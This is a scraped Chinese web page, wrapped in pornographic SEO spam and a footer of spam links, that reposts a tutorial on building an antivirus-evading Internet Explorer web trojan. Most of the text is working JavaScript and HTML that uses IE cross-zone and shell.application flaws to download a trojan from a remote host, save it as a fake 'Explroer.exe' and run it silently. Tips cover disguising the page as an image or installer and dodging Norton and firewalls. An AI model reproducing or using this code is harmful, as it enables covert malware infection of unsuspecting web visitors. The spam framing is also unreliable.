六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

免殺網馬DIY

[摘要]既然要打造完美的IE網頁木馬, 首先就必須給我們的完美制定一個標準, 我個人認為一個完美的IE網頁木馬至少應具備下列四項特征:   一:可以躲過殺毒軟件的追殺;   二:可以避開網絡防火墻的報警...

既然要打造完美的IE網頁木馬, 首先就必須給我們的完美制定一個標準, 我個人認為一個完美的IE網頁木馬至少應具備下列四項特征:

  一:可以躲過殺毒軟件的追殺;

  二:可以避開網絡防火墻的報警;

  三:能夠適用于多數的WINDOWS操作系統(主要包括WIN98、WINME、WIN2000、WINXP、WIN2003)中的多數IE版本(主要包括IE5.0、IE5.5、IE6.0), 最好能打倒SP補丁;

  四:讓瀏覽者不容易發覺IE變化, 即可以悄無聲息, 從而可以長久不被發現。

  (注意以上四點只是指網頁本身而言, 但不包括你的木馬程序, 也就是說我們的網頁木馬只是負責運行指定的木馬程序, 至于你的木馬程序的好壞只有你自己去選擇啦!別找我要, 我不會寫的哦!)

  滿足以上四點我想才可以讓你的馬兒更青春更長久, 跑的更歡更快……

  看了上面的幾點你是不是心動拉?別急, 我們還是先侃侃現有的各種IE網頁木馬的不足吧!

  第一種:利用古老的MIME漏洞的IE網頁木馬

  這種木馬現在還在流行, 但因為此漏洞太過古老且適用的IE版本較少, 而當時影響又太大, 補丁差不多都補上啦, 因此這種木馬的種植成功率比較低。

  第二種:利用com.ms.activeX.ActiveXComponent漏洞, 結合WSH及FSO控件的IE網頁木馬

  雖然com.ms.activeX.ActiveXComponent漏洞廣泛存在于多數IE版本中, 是一個比較好的漏洞, 利用價值非常高, 但卻因為它結合了流行的病毒調用的WSH及FSO控件, 使其雖說可以避開網絡防火墻的報警, 可逃不脫殺毒軟件的追捕(如諾頓)。

  第三種:利用OBJECT對象類型確認漏洞(Object Data Remote)并結合WSH及FSO控件的IE網頁木馬(典型的代表有動鯊網頁木馬生成器)

  此種木馬最大的優點是適應的IE版本多, 且漏洞較新, 但卻有如下不足:

  1、因為此漏洞要調用Mshta.exe來訪問網絡下載木馬程序, 所以會引起防火墻報警(如天網防火墻);

  2、如果此IE網頁木馬又利用了WSH及FSO控件, 同樣逃不脫殺毒軟件的追捕(如諾頓), 而

動鯊網頁木馬又恰恰使用了WSH及FSO控件, 嘆口氣……可惜呀……?

  3、再有就是這個漏洞需要網頁服務器支持動態網頁如ASP、JSP、CGI等, 這就影響了它的發揮, 畢竟現在的免費穩定的動態網頁空間是少之又少;雖說此漏洞也可利用郵件MIME的形式(見我在安全焦點上發表的文章:《由錯誤MIME漏洞的利用想到的......---IE Object Data 數據遠程執行漏洞的利用》http://www.xfocus.net/articles/200309/607.html)來利用, 但經測試發現對IE6.0不起作用。

  看到上面的分析你是不是有了這種感覺:千軍易得, 一將難求, 馬兒成群, 奈何千里馬難尋!別急, 下面讓我帶這大家一起打造我心中的完美IE網頁木馬。

  首先要躲過殺毒軟件的追殺, 我們就不能利用WSH和FSO控件, 因為只要利用了WSH和FSO控件就一定逃不脫“諾頓”的追殺, 這可叫我們該如何是好?!別急, 經過我的努力工作(說真的我也是在研究ASP木馬時偶然發現的靈感)終于我有找到了一個可以用的控件, 那就是 shell.application, 并且它可是經過了安全認證的, 可以在“我的電腦”域中的網頁中暢通無阻的執行, 比WSH和FSO更容易得到執行權限(利用跨域漏洞即可), 請看下面javascript代碼:

<SCRIPT LANGUAGE="javascript" type="text/javascript">

var shell=new ActiveXObject("shell.application");

shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb();

</SCRIPT>

保存為test.htm后打開看是否自動打開了記事本程序, 而且不會象WSH和FSO那樣出現是否允許運行的提示框, 是不是有點興趣啦?現在我們已可以運行所有已知路徑的程序, 但我們要求運行我們自己的木馬程序, 所以還要求把我們的木馬程序下載到瀏覽者的電腦上并找出它的位置。 我們一個個來解決:

  1、下載木馬程序到瀏覽者的電腦中

  這一點可以有很多解決方法, 比如我以前提到的WINDOWS幫助文件訪問協議下載任意文件漏洞(its:), 不過這次我們不用它, 再教大家兩個更好的下載方法:

  例一:利用SCRIPT標簽, 代碼如下:

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>

注意此處的LANGUAGE屬性可以為除javascript、VBScript、JScript以外的字符串,也可以是漢字, 至于src的屬性當然是你的木馬程序的地址啦!因為現在免費空間出于安全考慮, 多數不允許上傳exe文件, 我們可以變通一下把擴展名exe改為bat或pif、scr、com, 同樣可以運行。

  例二:利用LINK標簽, 代碼如下:

<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>

把代碼放在標簽<HEAD></HEAD>中間, href屬性值為木馬程序的地址。

上面兩個是我所知的最好的兩種下載木馬程序的方法, 它們下載后的程序都保存在在IE臨時目錄Temporary Internet Files目錄下的子目錄中。

  2、找出已下載到瀏覽者的腦中的木馬程序路徑

  我們可以利用shell.application控件的一些屬性和方法, 并結合js的錯誤處理try{}catch(e){}finally{}語句,進行遞歸調用來找到木馬程序的路徑, 代碼如下: function icyfoxlovelace(){

//得到WINDOWS系統目錄和系統盤

url=document.location.href;

xtmu=url.substring(6,url.indexOf(’\\’,9)+1);

xtp=url.substr(6,3);

var shell=new ActiveXObject("shell.application");

var runbz=1;

//此處設置木馬程序的大小, 以字節為單位

//請把198201改為你的木馬程序的實際大小

var exeSize=198201;

//設置木馬程序名及擴展名(exe,com,bat,pif,scr), 用于判斷是否是所下載的木馬程序

//請把下面兩行中的icyfox改為你的木馬程序名, bat改為你的木馬程序的擴展名

var a=/icyfox\[\d*\]\.bat/gi;

a.compile("icyfox\\[\\d*\\]\\.bat","gi");

var b=/[A-Za-z]:\\/gi;

b.compile("[A-Za-z]:\\\\","gi");//正則表達式,用于判斷是否是盤的根目錄

//下面的代碼查找并運行木馬程序

wjj(xtmu+"Temporary Internet Files\\");//Content.IE5\if(runbz)wjj(xtp+"Documents and Settings\\");

if(runbz)yp();

//在所有硬盤分區下查找并運行木馬程序

function yp(){

try{

var c=new Enumerator(shell.namespace("c:\\").ParentFolder.Items());

for (;!c.atEnd();c.moveNext()){

if(runbz){if(b.test(c.item().path))wjj(c.item().path);}

else break;

}

}catch(e){}

}

//利用遞歸在指定目錄(包括子目錄)下查找并運行木馬程序

function wjj(b){

try{

var c=new Enumerator(shell.namespace(b).Items());

for (;!c.atEnd();c.moveNext()){

if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){

var f=c.item().path;

var v=f.lastIndexOf(’\\’)+1;

try{

shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb();//運行木馬程序

runbz=0;

break;

}catch(e){}

}

if(!c.item().Size)wjj(c.item().path+"\\");//如果是子目錄則遞歸調用

}

}catch(e){}

}

}

icyfoxlovelace();

請把以上代碼保存為icyfox.js。

  接下來我們就要利用一個小小跨域執行漏洞, 來獲得“我的電腦”域的網頁權限, 大家以前是不是和我一樣覺得這種漏洞僅僅只能用來進行跨站腳本攻擊, 得到COOKIE之類的東東呢?這次它終于可以露臉啦!代碼如下:

<HTML>

<HEAD>

<META http-equiv=Content-Type content="text/html; charset=gb2312">

<TITLE>冰狐浪子網絡技術實驗室的完美IE網頁木馬</TITLE>

</HEAD>

<BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0">

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>

<SCRIPT LANGUAGE="javascript">

//此處設置上面icyfox.js文件的網絡地址

//請把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js文件實際上傳地址

jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’);

WIE=navigator.appVersion;

if(WIE.indexOf("MSIE 5.0")>-1){

/*IE 5.0利用iframe標簽,src屬性設為icyfox://則會使此標簽具備“我的電腦”域的權限,原因是因為icyfox://是不存在的協議, 所以會IE會利用res://協議打開SHDOCLC.DLL中的語法錯誤頁syntax.htm, 而且SHDOCLC.DLL又位于系統目錄中, 為在 icyfox.js中得到WINDOWS系統目錄和系統盤提供數據;*/

document.write("<iframe style=’display:none;’ name=’icyfoxlovelace’ src="/’icyfox://"’><\/iframe>");

setTimeout("muma0()",1000);

}

else {

/*IE5.5、 IE6.0則利用_search漏洞, 把打開的地址設為icyfox://, 從而使_search搜索框具備“我的電腦”域的權限, 因為在IE6.0中無法用上面的iframe漏洞, IE5.5應該可以用, 我沒有測試。 這樣做的結果會打開搜索欄,有點遺憾!*/

window.open("icyfox://","_search");

setTimeout("muma1()",1000);

}

//下面利用file:javascript:協議漏洞在已是我的電腦”域的權限的“icyfox://”中插入icyfox.js腳本并運行

function muma0(){

window.open("file:javascript:document.all.tags(’SCRIPT’)[0].src=’"+jsurl+"’;eval();","icyfoxlovelace");

}

function muma1(){

window.open("file:javascript:document.all.tags(’SCRIPT’)[0].src=’"+jsurl+"’;eval();","_search");}

</SCRIPT>

</BODY>

<NOSCRIPT><iframe style="display:none;" src=’*.*’></iframe></NOSCRIPT>

</HTML>

把上面的代碼保存為icyfox.htm,如果你愿意可以把擴展名改為jpg并在網頁中加入一個精美的圖片背景, 來做一個圖片木馬, 甚至你可以改為 exe, 來冒充一個好的程序的下載地址, 并在網頁的<HEAD></HEAD>中加入標簽<meta http-equiv="refresh" content="5;url=’http://www.godog.y365.com/winrar.exe’">來定時轉到另一個真正的程序下載地址, 從而更好的欺騙別人。

  看到上面的東東是不是讓你有了馬上去實驗的沖動, 別急, 如果你覺得win98沒必要控制的話, 還有更好的木馬等著你, 不知大家是否用過 win2000、winxp等系統中默認安裝的ADODB.Stream及Microsoft.XMLHTTP控件?它們可是和 shell.application控件一樣是經過了安全認證的, 可以在“我的電腦”域中的網頁中暢通無阻執行的好東西呀!請看下面的代碼:

function icyfox(){

//設置下載后保存在系統目錄下的木馬程序名, 我設的是不是很象Explorer.exe呀?呵呵

var name="Explroer.exe";

//設置你要下載的木馬程序的地址(此處你可以把擴展名任意改, 甚至沒有擴展名也可以的)

//可以更好的躲過免費主頁空間的上傳限制

var url="http://www.godog.y365.com/wodemuma/icyfox.bat";

try{

var folder=document.location.href;

folder=folder.substring(6,folder.indexOf(’\\’,9)+1)+name;

var xml=new ActiveXObject("Microsoft.XMLHTTP");

xml.open("GET",url,false);

xml.send();

if(xml.status==200){

var ado=new ActiveXObject("ADODB.Stream");

ado.Type=1;

ado.Open();

ado.write(xml.responseBody);

ado.SaveToFile(folder,2);

ado.Close();

ado=null;

}

xml=null;

document.body.insertAdjacentHTML(’AfterBegin’,’<OBJECT style="display:none;" TYPE="application/x-oleobject" CODEBASE="’+folder+’"></OBJECT>’);

}

catch(e){}

}

icyfox();

把上面的的代碼保存為icyfox.js替換上面保存的icyfox.js文件, 同樣利用上面的icyfox.htm來注入到“我的電腦”域中, 呵呵你就偷這樂吧!

  最后還請大家發揮以下DIY的能力把上面兩種代碼合二為一, 我相信一個現階段最最完美的IE網頁木馬就會在你手中誕生啦!是不是神不知鬼不覺?

提示代碼如下:

try{new ActiveXObject("ADODB.Stream");icyfox();}catch(e){icyfoxlovelace();}

 


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




標簽:免殺網馬DIY 
主站蜘蛛池模板: 水蜜桃一区一区三全集 | 手机三级在线 | 天天操天天射天天操 | 午夜视频在线观看完整高清在线 | 天天插天天搞 | 日本午夜www高清视频 | 特级毛片黑人三人共一女 | 日韩激情视频在线 | 青青青免费在线视频 | 欧美一级高清片欧美国产欧美 | 日韩免费高清一级毛片在线 | 一级特级女人18毛片免费视频 | 午夜影视免费完整高清在线观看网站 | 色噜噜狠狠色综合欧洲 | 探花视频免费播放观看 | 一级做a爰片性色毛片小说 一级做a爰片性色毛片思念网 | 日韩1页 | 五月激激激综合网色播免费 | 午夜伦情| 天天躁日日躁狠狠躁视频下载播二 | 首页国产精品萌社区 | 天天干天天玩 | 人人公开免费超级碰碰碰视频 | 青青草一区 | 婷婷六月久久综合丁香乐透 | 欧美特级午夜一区二区三区 | 日韩欧美国产中文字幕 | 婷婷开心激情网 | 亚洲国产精品久久久天堂麻豆 | 欧美午夜影院 | 四虎精品永久在线网址 | 日本一本在线观看 | 亚洲小视频在线观看 | 色狠狠狠狠综合影视 | 午夜久久久久久亚洲国产精品 | 四虎黄色网址 | 日本欧美激情 | 日韩精品一区二区在线观看 | 深夜在线观看免费看视频 | 日本aⅴ永久免费网站www | 五月婷婷一区二区 |